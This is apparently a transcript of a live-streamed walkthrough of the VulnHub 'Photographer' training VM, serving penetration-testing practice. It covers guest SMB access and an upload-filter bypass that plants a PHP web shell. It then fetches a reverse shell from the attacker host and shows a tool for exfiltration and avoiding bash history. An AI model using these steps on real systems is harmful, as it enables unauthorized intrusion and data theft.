All right, let's get this thing started. So, I've been wanting to do this for a while. I just didn't know the best way to approach it. Um, I suck at doing some things that are related to pen testing, and I want to get better. I don't do it professionally. I'm more of a hobbyist, like many people that do this stuff. Um, I like to think I'm okay at it. Not the greatest though. I mainly suck at privilege escalation. That's what I've been trying to work on lately. In this box, I actually learned something new on it, and I can't wait to show that. So before we get started, if you want to follow along with me, you should have the VM downloaded by now. If not, it might take you a minute to catch up. It's all right though. Just head over to VulnHub.com. And the one that we're going to be working on today is this very first one in the list called Photographer. You just click it and then choose one of the download links here. Once you pull that down, you can run it in VirtualBox. That's what I'm running it in. You also are probably going to want to take a look at the walkthrough that I did. So if you head over to .netrussell.com and depending on when you're watching this. If you're watching it live, then it'll be the first link that's up there, the VulnHub Photographer VM walkthrough. Just click on that, and it'll have the walkthrough that I'm going to be following tonight. If you're watching it in the future, just click on the boot to root over here or infosec, and you'll find it. All right, so I guess we just might as well get started. I'm going to go ahead and clear that out because we're going to need that later. So I've already, at this point, started the vulnerable VM. I'm on the network with it. And I already have the IP. So we don't have to do that part of the scanning. If I did want to scan for it, I would just type in, the network IP, which is 192.168.158. And then you can do, Nmap. And then you can do 0 through 255, and then SN to just show the active hosts on the network. I'm not going to do that because I don't want to dump out my whole network on YouTube, but that's what I did. And then your target machine will pop up in there, and you can pick up right where we're at. So we're just going to assume that I've already done this. There's our IP. That's what we're going to be attacking tonight. It's going to be different than what's in the walkthrough just because I moved it to a different machine, so it didn't eat up all my resources while we're streaming. So that's why the IP is different than what's in the walkthrough notes. But all right, so the first thing that I like to do when I'm picking up a box is I want to Nmap scan. So we're going to do Nmap 192.168.158.161, and then I'm going to say top ports 100. And I'm going to say open, because I just want to see what's open. And it's blocking. Wow, there you go for live stream fail. Alright, hang on. Let's see if I can boot it up on my desktop and hopefully it doesn't destroy my memory. Just boot it up over here. In this case, it will be the same IP then. It should be. Let's see here. Wait for it to boot. Alright, cool. So it's responding. We'll just use this one. Hopefully that's it. We'll see when we do the Nmap scan. Alright, so same deal. Type in the IP, top 100 ports. Okay, yeah, that's our target right there. So as you can see, the target has a few ports open. We have port 80, 139, 1445, and 8000. Uh, so we can work with this. The next thing I'm going to do is I'm going to do another Nmap scan, but I'm going to do a script scan, and I'm going to target just those ports. So Nmap, SC for script scan, 192.168.158.175, and then the ports of 80, comma 139, comma 445, comma 8000, and that should give us a script scan. Make this a little bigger so you can see. Now, the scanning takes a little bit. It'll move a little bit faster once the scanning's done. The longest scan is going to be the NIC2 scan, but we got some other stuff to look at while that's going on, so no big deal. This was a really well put together box. I forget what the guy's name is. I know his Twitter handle, but he did a nice job putting this together. I was really pleased. I'm always looking for OSCP practice, so it was cool to find this one. All right, so our scan came back, and as you can see, we got a bunch of stuff that came out of the script scan here. A bunch of good information. It looks like we've got a HTTP server running on port 80. We have something here. It's probably SMB. And then we have another HTTP server running on port 8000. So there's really no point in hammering on this thing until we know fully what it does. Obviously, we have some SMB script information that came back here. We'll take a look at that in a second. Before I start doing that, though, I just want to open it up in the browser and see what this thing does. You know, just see what the websites are, because for all we know, the websites could be like an admin terminal panel, just like baked into it. So let's open this up and take a look at what it is. All right, so this is the port 80 web server that's running. Doesn't look like anything too crazy. They got lorem ipsum in here, so it's pretty much a stock install, it looks like, of whatever this is. Nothing too crazy. Doesn't look like there's any login links or anything, so let's take a look at port 8000. Oop, not 80, 8. My bad. 8000. Okay. So port 8000, it looks like it's got something running here. We got a timeline and an album and content link and essays. Now, when I first downloaded this VM, there was something in here already. So just so you know, if you download it and you see something in there, you can ignore it for now. All right, so now we know we have some web servers running. I'm going to go ahead and start my NIC2 scans. NIC2 is really good. If you haven't used it, it's a great tool. Yeah, it pulls back all types of vulnerabilities. So we're going to run one for both. We're going to run one for, here, let's do it in tab order here. So this one will be port 80, NIC2, and then H for the host name, http colon backslash 192.168.158.175. That should be good for that one. So that'll be the port 80 getting scanned. We're also going to scan port 8000. And that's also HTTP. I think I've only ever seen one or two boxes have SSL actually implemented, which is pretty cool. You can use, there's tools that'll do it. This NIC2 will handle SSL. I've actually found some bug bounties with NIC2. It's a really good tool. So let's go take a look at this as it's dumping out here. So we got the server version here. And nothing in here yet. Let me see. This IP address found in the location, just ignore that. That's not a big deal for us. For a vulnerable VirtualBox machine running, it's not a big deal. Yeah, same deal. Oh, there we go. Directory listing found. Alright, we got a couple things. Let's take a look at this first one, the directory listing. So, I'm going to do, I think that was images. Images. Yeah, so we got some directory listing on the web server. That's good. That's a good start. You know, directory listing, that can be useful. It's not useful in this case because it's just images. But if there were another directory in here that we wanted to look at that came back, that might be useful for us. Maybe a backups folder or something that we could just pull stuff right out of. But not useful at the moment. And then this one says that if you add /?(-s, it lets you retrieve the source code of PHP files. I've actually seen this one work before, not on this one. I've seen being able to pull back the PHP source code. It's pretty cool, especially if you have like a WordPress site, because you can dump out like the config, the WP config. You know, I noticed a lot of this is about, it's kind of a chicken and egg problem. You really can't do this unless you understand how the servers are all configured, and you really don't want to put a web server up and configure it unless you know that it's going to be secure. So yeah, you just got to kind of get out there and mess with it. But yeah, you can dump out WP config with the if you can ever get this one to work. Unfortunately, on ours, I tried this in here just to see if there was anything, but like index.php, but I couldn't find any PHP pages, so we couldn't really try it on that. That's okay, no big deal. Let's see what the other Nick2 script came back with. So, same deal, got another version of Apache. I think it's the same version. I don't think it's the same instance. I think they have different instances running. I'm not sure. I probably should have looked at the box more closely. Don't really care about cross-site scripting on this because it doesn't matter to me right now. That doesn't matter. It says it's outdated. So we might be able to get a exploit. If we couldn't find a way in, we might be able to get an exploit on the Apache version, especially since it's listed twice on here. So I'm confident that that's the version they're running. I mean, we can. I mean, it's just banner grabbing, so it's probably doing something like, you know, 192.168.175.80. 80, and then you do like get HTTP 1.1. So you can see it's dumping out its version right there. Not a whole lot in the banner there that's useful other than the version that I can see. So let's keep going here. All right, uncommon header. I've never seen that one. I don't know what that is. Web server returns valid response for junk HTTP methods. Might cause false positives. And debug HTTP verb may show server debug information. Yeah, there's all types of good stuff that Nick2 prints out. I actually run this against my web server pretty frequently. I mean, just for practice for me, and also because peace of mind that my server is not going to get popped. I run WordPress, or the WP Scan. I don't think I use WP Scan on this target, but if you haven't seen it, WP Scan, it's really awesome. Whenever I see a WordPress site, this is like literally the first thing that I pull out because it's so good. It'll tell you like version information, and you can even brute force logins with it, all types of good stuff. WP scans the shit. All right, what else do we got? All right, there we go. Now we're getting some stuff back from Nick too. So, looks like there might be an admin page and then something for an app, and this probably redirects back to the main landing page. Let's go look at the admin page and see what that's got for us. All right, so it looks like there's an email and a password that we need. So, I know that we could throw like a users list against this. If you don't know, Kali comes with Kali and Parrot, and I'm sure other pen testing distros come with, word lists. So if we look in user share word lists, and then what do we got in here? So rocku.txt, that's really good for passwords. If I were trying to brute force this, I would use that for the passwords. And then inside Metasploit, they have a bunch of users lists. I accidentally printed it out twice here, but they have a bunch of user lists in here that are really good. But it's really too early on, I think, to start brute forcing. So we're not going to do that just yet. I don't think there's any need to. So what's next? So we found an admin panel. That's pretty good. I didn't see anything else in the NIC2 scan that that led me to believe that it was a good path forward. So now we kind of know a little bit more about the attack surface. Let's keep going with the Nmap scan, and let's look at this SMB OS Discovery printout that we have here. So it's saying that it's running Windows 6.1. I'm skeptical of that. It's saying that it's running Samba 4.3.11 on Ubuntu, or made for Ubuntu. It's saying the computer's name is Photographer, so that's good to know. What else do we got here? Look at that. SMB security mode is guest. Authentication level is user. All right. So what can we do with SMB information? Well, Kali comes with this tool called SMB Client. And what it does is it lets you attach to SMB shares, and it lets you, pull files off there if you can authenticate with it. So the first thing I'm going to do is I'm going to look at this machine and see if we can see what shares are active. So I'm going to do SMB client L, and then the host name, or I'm sorry, the IP. And then I'm going to use the user guest. And then I'm just going to hit enter for password. And it looks like there are 3 shares: print $, Samba share, and IPC $. So what we can do is we can try and access these without using password by using SMB client again. So we're going to do SMB client /guest / let's do print first. We'll just do them in order. Print and then the IP address. And then we're going to use the flag N for no password. And it's going to bomb. Access denied. Oh, no, it didn't bomb. It's just saying access denied. Okay, so let's try Samba share. If I can spell it right. Samba share. There we go. All right, it looks like we got connected. So I'm going to use ls. Actually, let's do help to see what commands we have. So these should be the commands that are available to us. We can see pwd. That's our current working directory. We should be able to list what's in the directory. There's 2 things in there. There's a file called mailsent.txt, and then there's a zip file called WordPress backup. That looks tasty. So let's go ahead and pull both of these down. You know what though? I'm not in the right directory. Let me Let me get back to, I guess, let's do this the right way. Instead of exiting SMB, let's do bang cd root photographer, and then bang ls. All right, so now I'm in my root directory. I should be. Am I not? Bang pwd. Oh, I guess that doesn't work. I thought the bang would let you switch directories. All right, that's okay. Let's just exit, and then we'll do cd root photographer. Okay. We're going to clear all this out, and then reconnect to our target, ls, and then what we should be able to do is just say get mailsent.txt, and this will pull it down to our machine. Bang ls, there it is. And then I'm going to do get WordPress backup zip. And bang ls to make sure it went through. Looks like it did. All right, let's exit that and clear out. All right, let's take a look at these. So that WordPress backup zip, that's, I know I want to look at the mail, but I mean, if that's truly a backup, then it might have credentials in it, because remember I was talking about WordPress config earlier. So let's unzip that and take a look inside. All right, so cd into WordPress, and okay, so let's take a look at this. So WordPress, when you configure the site, it will get rid of, or it won't get rid of it, it'll actually leave this in there. It'll leave wp-config -sample.php in there, but it will also generate another file called wp-config.php, and that file will have your credentials in it for like accessing the database and stuff. Unfortunately, it doesn't look like this WordPress was configured, so if we dump out, if we cat wp comments, or I'm sorry, wp config, oh, config, there we go. If we cat that out, you'll see that it's just going to be either empty stuff or default values. So right here is where you would see the real stuff, but that's not real credentials as far as I can tell. It's in Spanish. It says, I think it's in Spanish. It says name of user here, and then I'm assuming that means password here. Assuming it's in Spanish, maybe Portuguese. I don't know. I don't speak either of those languages well enough to know. I can tell you those aren't credentials for this that we need though. So let's clear that, and then let's take a look at the message text. So I'm going to cat, what was that? Oh, we're still in the WordPress directory. Go back, clear ls, cat mail sent. All right, let me make this a little bit bigger so you can see. So this says, it's an email from AGI Clarence at agi@photographer.com, and it's going to Diza, I can't pronounce her name, but that's her email, and it says subject to do hyphen her website, and then it says, hi, your site is ready now, don't forget your secret, my baby girl, winky face. That's mildly creepy, but I think that might be a hint for us. So if you remember our login page, it needs an email address and a password. So I'm guessing that this would be our email address because it's an email address, so I'm going to copy that. And I'm also guessing that don't forget your secret, my baby girl, is her password, probably baby girl. So let's give that a try. Put that in, and I'm going to type baby girl, all lowercase, and I feel dirty. Don't save, and all right, looks like we're logged in. That's good. So let's take a look around the site. It looks like this is some kind of content dashboard. Lets you upload stuff. Bunch of links. Last import. Favorites. Not a whole lot in here already. Yeah, not a whole lot in here already, but it looks like we have a way to upload things to the web server. And that is a good start. Settings. I don't see anything in settings that would be useful to us. I don't care about the store. Okay, so let's take a look at this import content and see what this does. So my objective here is I want to get access to this machine, and anytime there's a file upload, that's like obviously a great way to get access, because guess what? You have the ability to put files on a web server now. So how are we going to do this? It says drop files here or click to browse, JPEG, PNG, GIF. That's right, I said GIF in case anybody missed that. GIF and MP4. So I guess the first thing I want to see is if this actually is restricted to just images. It says all files. I wonder if I can upload a test file. Let's see. So I'm going to, let's go over to the home directory, home Kali. And let's go to the desktop so I can access this quickly. And I'm going to just cat something simple like cat test.txt test. Okay, so you can see it over there on my desktop. And let's give this a refresh. See if we can upload our test file to the. All right. It says error uploading test.txt file extension error. Okay, so there's some type of restriction here preventing us from uploading things that aren't images. So there's a number of ways around this. I actually tried quite a few on this one, but unfortunately, I mean, I guess fortunately for learning, but unfortunately we had to do it the hard way. I just wanted to show really quick a couple of the ways that you might be able to bypass this. So one of the ways that you could try and bypass this is by taking your file and adding your target extension and then doing another dot and then doing like PNG. Whoops. Test.txt. And what this will do is sometimes it can slip one past the goalie. You know, you can kind of trick this thing into, oh, maybe it will upload it. Oh, that's right. I think I was able to upload it, but I wasn't able to execute it. I think that's what it came down to. So it just really depends on the web server, what it's going to let you do. We're not going to spend a lot of time on this. You can look up different ways to bypass image upload filters. But that's the long and short of it, is that you can change the file extensions, add spaces in there. You could put a null byte in there in between the extensions, maybe a semicolon, and it'll give you different ways to upload stuff. What we're going to do is a little more complex than that. It's more complex, but it's not. It's actually easier, I think. So we're going to set up burp, and we're going to intercept the post to the web server, and we're going to inject some PHP in there. It should be pretty straightforward. So the first thing I'm going to do is I'm going to go in here and I'm going to type in burp, and I'm going to start it up. And the community edition, it works fine. I never had the pro version, though. I've heard a ton of great things about it. Maybe one day. Maybe if bug bounties start paying off or streaming boot to roots pays off, maybe I'll buy the pro version. But I don't need it today. Okay. So I'm not going to update, and I'm just going to click through and start burp. If you have questions, feel free to ask in the chat channel. I can see it. I'm happy to answer any questions along the way, or if you just want to talk, I'm cool with that too. Okay, while that's getting booted up, another thing that we have to do is we have to go into the browser and we have to set up the proxy. Otherwise, this isn't going to work, and it's not in Customize. Don't do what I did. It's going to be under Preferences. So you go into Preferences for Firefox. Actually, most of the browsers are the same. If you're not using Firefox, if you're using Chrome or whatever. Essentially, you just go in here, type in proxy, open up these settings, and then you're going to manually set to 127.0.0.1 with port 8080. This is what Burp defaults to. So I've used Burp to man in the middle all types of things. You can man in the middle applications. You can most people use it for browsers. If you watch like Stoic or whomever on stream the bug bounties, they're usually man in the middling browsers. But I've used this on web application, anything that has a config that you can point to like a web server. So if you're an engineer, you can use it for this. I've used it for UWP applications and stuff. It's real easy. But essentially, that's what you want to do. Point your application or your web browser at 127.0.0.1, port 8080. We're not going to need these other protocols, but we're going to just use, we're going to click use for all protocols anyways. Hit OK. Now that should be it, essentially. You go to the proxy tab in Burp, and you'll see that intercept is on. And now if I were to upload that file again, that text file again, should get an intercept here. Okay, yeah, so you can see that Burp intercepted this. Now, not only did it intercept it, but it prevented the traffic from continuing forward. Okay, so this hasn't hit the web server yet. And that's important because that means that we could actually modify this in stream. We can, which is actually what we're going to do. We can drop this so that it never gets to the server. Or we can just inspect the data and pass it along, and the user would never be any wiser. But you can see it's posting to api.php. Looks like we've got a token here, some type of token, session token for Koken. That's the name of the application, I guess, that's running, or the website that's running. It's Koken. And then down here you can see our payload information. We've got the file name test.php.png. We have there's our text right there, test, and then another file name. I don't know if you have to change both of these. I think the first time I did this, I only changed one of them and it worked. This one might just be for reference. I'm not sure. That's something I want to mess with in the future. But what we're going to do from here is we're going to right click and we're going to click send to repeater. And we can go ahead and drop this so that it's not hanging out. So we're going to head over to repeater, and now you can see that we have that same payload right here. Now we're going to change it. So let's change this to something that we can use. Let's change it to, or actually, let's just test to see if it works, okay? Because we don't even know if this is going to work at this point. So we're going to change it to test.php, and we'll change this one down here too, just in case this is checked. And then in here, we're going to just type some PHP out. Let's go ahead and do PHP echo it works. We're going to spell works correctly, though. And then we'll close our PHP tag out, and that should be it. Hit send, and we'll see what happens. Okay, so it says 302 found. A 302 is a redirect. It looks like it's going to redirect us to another page. We're going to follow the redirect. And it says okay. It says 200. So I guess it worked. Let's go over to the application and take a look and see if it worked. Oh, we got to turn our proxy intercept off, otherwise we're gonna keep getting stopped. This is, if you use WordPress or anything, this is kind of like your preview. We could actually also go into the actual application, I think. So if we went to 192, yeah, there you go. And then if we go over to content, Oh, I've got two of them. I've got three of them. I think one was the original one that was in here. Let's see what this one does. So I clicked on it and it took me to this other page and it says download file. There you go. It works. Now, how do we know it actually works? Well, if it didn't actually work, then we would see all the PHP in here. We would see the PHP tags. But what this tells me is that this actually executed. And what's great is that PHP executes on the web server. So if you get PHP execution, you should be able to get a shell. So we're going to amp this up a little bit, and we're going to send over, let's see, what should we send over now? I'm going to send over just a basic web shell. Let's see if that works. Just like a something super simple. So let's go to repeater, and we'll type in basic web shell. I'm going to use the same cookie and everything. I think it'll work. So we'll call it basic web shell. And then in here, what we're going to do is, instead of echoing it works, we're going to echo out a get parameter that we're going to pass in when we call the page. So $_get, and then we're going to call our parameter cmd, and then we'll close it out. So essentially what this is going to do is, oh, you know what? We got to do a shell execute also. Otherwise, it's just going to echo our command back out. So what this says is it's going to get a URL parameter called cmd, and it's going to put whatever value it has in here. It's going to replace that in here. And then it's going to run shell execute on whatever we pass in. And then the result of that, it's going to echo it out. So we should be able to do things like ls and who am I and all of that stuff and see the result in the page. So I'm going to hit send and follow the redirect again. Got a 200 again. Let's go to content and see if it's in there. All right, basic web shell.php. Click download, and we got nothing because there was nothing for it to execute. But if I put $cmd who am I, and hit enter, we get www data back. So it executed our command. We should be able to do other things too, like see our current working directory. It looks like we're in some web root called Koken, storage, originals, database, and then CA. We can list out what's in here. It's like basic web shell is the only thing in here. Yeah, so it does. I'm willing to bet the web server probably puts whatever you upload into its own directory. So what if we did something like cat etc password? Hey, there you go. So that's all of our users on this system. So now we have a working web shell. I'm going to go ahead and grab this loot because everybody loves loot, and I'm going to throw this in our photographer directory here. We're going to call it password and dump that in there. Okay, so now we have that. What's next? How about we try and get a shell? Because web shells are nice, but reverse shells are fun. Let's do a full reverse shell. So what I'm going to do to get my reverse shell is I'm actually going to use a web shell that deploys with Kali. So in the if you do ls users, let me minimize this for a second so you can see what I'm doing here. Ls user share web shells. You'll see there's a bunch that are in here. These are really great. I've used a few of these. They all work really well. We're going to go into PHP and see what's in here. So it looks like there's find socket, PHP backdoor, PHP reverse shell, simple backdoor. I think simple backdoor is what I basically just did. I think that's essentially the same exact thing that I did. Let's look at that one. Let's see what that one is. User share web shells PHP simple backdoor. Just cat that out. Yeah, so essentially that's doing what I'm doing, just a little bit differently. It's looking at the request and grabbing the command and then making it prettified. But it's ideally it's the same thing. So we're not going to use that one. The one I actually want to use is the PHP Reverse Shell.php. I think this is the one I used earlier, and it worked really well. So we're going to use that one. So I'm going to copy this file. PHP Reverse Shell, and I'm going to copy it over to. There's a couple ways we can do this. I actually did this both ways just to see if they both worked. So the first way is we can upload it the same way that we just did. We can paste it in and use Burp to inject it onto the web server. Another way that we can do it, which is what I'm actually going to do, is we're going to upload it to our Apache web server, and we're going to wget it onto the machine. So I'm going to copy this over to var www.html, and then we'll go over there really quick. HTML, there we go. I'm going to name this something a little bit easier so that I can remember it. We're just going to call it rshell443.php. Actually, we'll call it 444. We'll do it on 444. No. 443 is better. I like 443. Okay. Oh, duh. PHP. Not a pro. Okay. So the next thing we do, before we can upload this, we have to actually go in here and modify this because we don't have any way of sending it back to us because it doesn't know our information. So we're going to open this up. And if you scroll down, first thing I'm going to do is I'm going to get rid of all this extra crap because this is just extra bytes that we got to send over the wire. Get rid of all that. All right, so we're going to change this to our IP address, the attacking machine, which I believe is 192.168.158.192, I think. I might as well just check really quick just to make sure. We do ifconfig. Yeah, okay, that's it. So we're going to say 443 is the port, and that is essentially all we need to set. Everything else is good to go. So I'm going to close that, and then I'm going to do service Apache 2 start. I'm going to spell Apache correctly, though. Apache, there we go. And if we look, service Apache 2 status, it should be good. Okay, it's active and running. Oops. So now what we can do is we can go ahead and start our handler, netcat lvp 443. That creates a listener over here. Oh, yeah, we can do that now. I guess that's fine. Before we do that, though, we got to get our payload onto the box. So the command I'm going to send this time is wget http :/192.168.158.192, and then it's called rshell443. Oh, you know what? That's not going to work because we named it PHP, and our web server will execute it, and then I will get a shell to myself. So we need to real quick change that to get rid of the PHP extension. Okay, that's good to go. We can start our handler back up now. That's no problem. All right, let's try that again. 192.168.158.192, and we just called it rshell443. Okay, we didn't get any response back because there was nothing to echo out, but if we ls this time, we see it's in there. Okay, cool. So now all I should really have to do to get my shell is move rshell443 to rshell 443.php. And then we will ls again just to make sure that worked. Yes, it did. Okay, so now if I call, if I just navigate to it, our shell 443.php, we should get a shell. And we did. All right, so we have our first reverse shell. And we are www data. And we should be in that working directory. Oh, it dropped us into root. I don't know why it dropped us into root. That must be part of the script. I bet you that script does that. Really, I want to be in TMP though, because before I do anything else, I'm going to plug a tool that I wrote. Not only am I plugging it, but I actually use it. I wrote this tool to use. So feel free to use it. Feel free to don't use it. I don't really care. I use it and I like it. It makes navigating machines much easier. So I'm going to go to github.com/.netrussell. And I'm going to look for Shinobi Shell. And I'm going to click on shinobishell.py and raw. And I'm going to copy this link. And then I'm going to come over here and I'm going to wget this into the temp directory. We use the temp directory because the temp directory is usually writable. All right, so there it is, Shinobi Shell. I'm going to chmod, make it executable. Let's see if that worked. It did. Okay, cool. So now what I'm going to do is Shinobi Shell has all types of fun stuff built into it. We also need it on our attacking machine. So what Shinobi Shell does is it's a client-server model. And essentially what it lets you do is, well, here, let me show you. So we'll pull it over here, chmod. This is my attacking machine, remember. And we're going to start it up, but first we're going to look at the help. Okay, so I'm going to want to run Shinobi Shell L for listen. Now, what I would normally do is do L and do K. K will create, it'll ask you for a key, and then every machine that you run Shinobi Shell on and it connects back with, you use that key and it will create an encrypted tunnel for you between your target machine and your attacking machine, or a target machine and your Shinobi server. My Shinobi server in this case is my attacking machine. It could be anywhere though. It doesn't have to be my attacking machine. But yeah, so that's what's really great about Shinobi Shell is that it creates this tunnel between your attacking machine and your target machine that's encrypted. So you can pass, you can exfiltrate data over that encrypted tunnel, or you can pass payloads through that encrypted tunnel to your target machine, and it's all encrypted so nobody sees it. Another nice thing about the Shinobi Shell is that none of your commands that are in the Shinobi Shell are going into your bash history. So that's, you know, covering your tracks. So we're not going to use the K command on this one just because I tried it earlier and it just sets up a plain text tunnel because the target machine doesn't have the proper Python library installed. So it doesn't work on that one, but it has worked on other machines and it works really well. Okay, so Shinobi Shell and then attack L for listen, and it says it expects an argument. What did I do wrong here? Yeah, I recently updated my repo. I wonder if I messed it up. Program L expects one line, one argument. I bet you that I updated this and I didn't. I bet you I updated this and I didn't test it. Let me fix that really quick. So we're gonna look for tac L in here. Here it is. Listen. So why didn't that work? Let me try commenting out the stuff that I added in. Let me make sure I'm just running it right here. You'd think I know how to run my own tool. Yeah, I'm pretty sure that I messed it up when I... Pretty sure I messed it up when I added that new feature in. Let's just do this. We're going to debug it live. No, I'm not going to debug it live. I guess we can just skip it. I really didn't want to skip using my sweet tool, but I guess that's probably better than trying to debug this live. That sucks. Oh well, such is life. Yeah, alright. We'll skip that for now. Maybe you'll see Shinobi Shell in a future video. Obviously, it's still in beta. Okay, we're going to skip Shinobi. Actually, you know what? We can still use Shinobi Shell over here. We just can't use the loot features or any of the other really sweet stuff that it comes with. But we can use some of the features. So the first thing I'm going to do is do Shinobi Shell tac t, and that'll dump out the TTY cheat sheet, because we want a TTY shell over here. So I'm going to copy and paste that in, and now we should have a TTY shell. The next thing I'm going to do is start it up. I think we can start this without... a server. We just give it the connect, and I think I can just like trick it into working. We'll just give it some garbage here. We'll just give it its default values. Oh yeah, okay, it's not gonna work. That's alright, we'll skip over Shinobi Shell for now. You guys will see it in a future video. I guess it's better to do it this way anyways. So, alright, so we just got a shell into the box. We want to try and privilege escalate now, because we're dub data. We're basically a nobody. We want to see what we can get. So the first thing I'm going to do is I'm going to go to the home directory, and I'm going to see what users are available to me. So it looks like there's the two users. These were the two sending the email from earlier, if you remember correctly. And I'm going to just change directory and head into one of them. I always do LSLA just in case there's some hidden stuff in here. It looks like there's a bash history file, but it's not readable to us. There's something called config that we can't read. All this looks pretty standard. I won't bore you by going through each of the subdirectories here. They're all empty except for share. If we go into share, you can see that's the Samba share that we had pulled that information off earlier. So I'm going to CD and go back. Let's look at this other one. A lot of the same. None of it's really readable to us. The bash RC file is readable, but you know, I know maybe this is why I suck at privilege escalation, because I know people say to look at that, and I have not found anything in bash RC or like a profile file at all. I mean, I guess it shows you what commands the user gets when they log in, but I haven't found that to be useful. If somebody else has, please reach out to me. I would love to hear your test case so I can learn from it. But if you see down here at the bottom, there is a world readable file called user.txt. And if I cat that out, we get our first flag, the user.txt flag. You're going to want to add that to your loot storage so you can brag later on Twitter. And that's basically it for the home directory. There's not a whole heck of a lot in here. Now, where do we go from here? There's a lot of really great tools that you can use to iterate through. Shinobi Shell was one of them. And so one of the features of Shinobi Shell, we're going to have to do it manually because I can't get this to run, which is a huge bummer. Oh, I'm a fucking idiot. Duh. Chalk it up to being first time on the live stream doing this. You guys can make fun of me in the comments. I don't mind. Obviously, Anthony, when you run Shinobi Shell, you have to give it a freaking port to listen on, you dumbass. Okay, so I think our other one was on 443. We're going to do this one on 444. Okay, there we go. So now this is our Shinobi server. It's up and running now. And what the Shinobi server is going to do, it's going to be our hub. So if we lose our shell on our box, we can reconnect to the Shinobi server and all of our loot storage will still be there. So let me head back into TMP and let's boot up Shinobi Shell. Shinobi Shell.py, and then we're going to say C for connect. It's going to ask us for the server address, which is 192.168.158.192. And then we're going to do colon 444. I think that was what we did. Okay, sweet. So it's got a connection. Let's go check with our server. Connection opened. All right. So what's cool about Shinobi Shell is you can actually send it multiple shells. So in the background, it's going to separate them all out by unique IDs and everything. So if you have multiple machines popped on your network or on your target network, you can send them all back to Shinobi Shell, and they all sync up. So let's look at first. Let's look at the commands here. So if we type in help, you can see there's all types of fun stuff that Shinobi Shell can do. Let's make this bigger and do that again. Okay, so there's all types that it can do. It can dump out the machine info. We'll see that here in a second. It can run search exploit for you, just like if you're running it on your Kali box. So now we have search exploit natively on our target machine. And what will happen if you type in search exploit? So if we do that, let's search exploit, and then let's say let's look for Tomcat. Okay. What it's doing is it's sending the command to the Shinobi server. It sends the command back here. It says command received, search exploit Tomcat. It executes the command on your attacking machine, and then it takes the results and chunks them up and sends them back over your encrypted tunnel, and then replays it in your Shinobi Shell on your target machine. So we can use search exploit here, and if we have any exploits that we want to run, we don't have to worry about trying to get them on the target machine anymore. We can just send them over the tunnel, over the Shinobi tunnel, and we can pull them down that way. It's really quick. That was one of the things I really hated about Privesk, was trying to do that. Another sweet thing that it can do is it can do exfil. So, for example, if we wanted to do exfil etc password, what it did is it went and got it from our target machine and it sent it back over the tunnel, and it saved it in whatever directory Shinobi Shell was running. So I'm pretty sure it was running in here. Yeah, so if we cat password, there it is right there. So we have the exfil feature. That's really nice. SS download. I'm going to update this. So I think when I wrote this, I didn't know that search exploit had a flag. You could type in search exploit M and then pass it the exploit you wanted, and it would actually go grab it for you. This actually reaches into the search exploit directory and grabs it for you. But I'm probably in a future release, I'm going to combine it into this one just because why not? Download URL. So this will actually do a wget for you. So if you did download URL on the target machine, it will pass that back to the attacking machine. Your attacking machine will go out to the web and download whatever you want and send it back to you. That's really nice, because if you use this on like in the OSCP lab, I'm pretty sure none of those boxes can beacon out to the internet. So you have to do the request on your attacking machine and then somehow get it to your target machine. It's a real pain in the ass. So this is really nice for that. I think Hack the Box does the same. I'm sure they're doing that because they don't want you like setting up Bitcoin miners and stuff on their machines. So they restrict internet access. But that's a really nice way around that. So this is one of the scripts that I was mentioning, linenum. We're going to want to run that, and we'll go from there. But let's start with this first command here called machine info. And this is really basic. It's just going to dump out a bunch of basic machine information for us. It's similar to linenum. This is like linenum light. Very basic information. So it's telling us our UID, our group, tells us if other users are logged in. It's showing us what services are running. Those are the ones that we knew about. 631, I think that's a cup server. I didn't look into it on this one. We didn't need to. It looks like there's a MySQL database running on 3306. I didn't, or actually I think I did connect to that. But the thing about the MySQL database, especially with WordPress, the passwords are, they're hashed. And you would have to crack them. So I didn't even bother with it. Here's all the processes that were running as root. Nothing in here stands out to me. Yeah, nothing in here stands out to me is something that we can attack. I did look at the light DM on the web server. Or on this machine, I couldn't find a way in through there. If somebody finds that, please let me know. I'd like to see it. I'm sure there's more than one way to get into this to get root. So here's your suid dump. So this is one of the things I learned on this machine. I learned about suid files and suid binaries. I guess that's a bit of a spoiler, but we're going to be looking at those here in a minute. And then machine info also dumps out the home directory, which is what I was going to show you before I forgot how to use my own freaking tool. So, all right. So we ran that. The next thing I want to run is linenum. So I'm just going to type in linenum, and it's going to go to my attacking server, or my attacking box, and it's going to download the newest version of linenum, and then it's going to send it back here for me to use. So linenum.sh. Now with linenum, I actually discovered something else new about this tool on this box as well. First off, I'm pretty sure if you do .-h that it will dump out I don't know what the hell just happened. Oh. I think there's a way... Oh, I forgot to chmod it. So let's try that again. linenum.sh tech-h. There you go. So one, I didn't know linenum had a help menu, so I learned that. Also, there's this really handy flag right here that does a thorough scan of the machine. We're not going to do that on this one because it takes a pretty long time. It's also really nice. It'll generate a report for you. I always just run it and then redirect the output into a file. I didn't realize that it did it'd generate a report for you. So yeah, all really cool stuff. We're just going to do it the old-fashioned way, linenum.sh, and I'm just going to redirect it to linenum output. And then That'll run for a minute here. So while we're waiting, there's another really good tool that I was able to discover because of this box, and I wanted to share it with everybody. It's called Suid3num. So we'll look at what linenum outputs, and then we're going to look at what Suid3num outputs, and you're going to see why it's a really great script. So let's exfil our linenum output back to our attacking box. That way we have we can persist it in case we lose our shell. So we'll go back over here, and let's do less uppercase R so that we get our coloring, and linenum. So let's look at the output here. Lots of great information here. It tells you the version of Linux that's running. That would be great if we needed to do a exploit of the operating system for privilege escalation. You get your environment variables, hostname, UID, all the group members. A lot of the stuff we know already. There's only one super user account, it's root. Linenum's really great. If you haven't used this tool, I really recommend giving it a shot. This makes privilege escalation a lot easier. Linux, it can really be a pain in the ass to escalate. If you're not familiar, if you don't spend a lot of time in Linux, it can be intimidating. I mean, I spend a lot of time in Linux, and I still don't know how to do a lot of this, but I'm getting there. So one way to privilege escalate that's popular is going through cron tab. We're going to look at what's available in cron tab. It's nothing in there that's executing. The idea behind privilege escalation is that we want to trick the root user into executing something for us so that we can get root. So one way to do that is if there's a cron tab operation running that we can access, that we can manipulate. If it's like running a script or something that we can write into, that's one way to do it. What else do we got here? Some ARP information. There's our listening ports again. It's worthwhile to understand how UDP works as well. I know in the OSC, if you're going for your OSCP, I know in the OSCP lab, they had some UDP services running, and I think I exploited one of them, but I always looked past them because the scans for UDP take forever. Okay, so process binaries and associated permissions from the above list. So this was a I think this is PS AUX or something along those lines running. Once again, we're just looking for things in here that we can use to escalate privileges. We don't care about the binary permissions because we're not going to be able to do that. This is a really good spot to look in these config files. I did go through a lot of these, admittedly. I didn't find anything in there. Maybe the author, if he ever watches this, he can tell me if 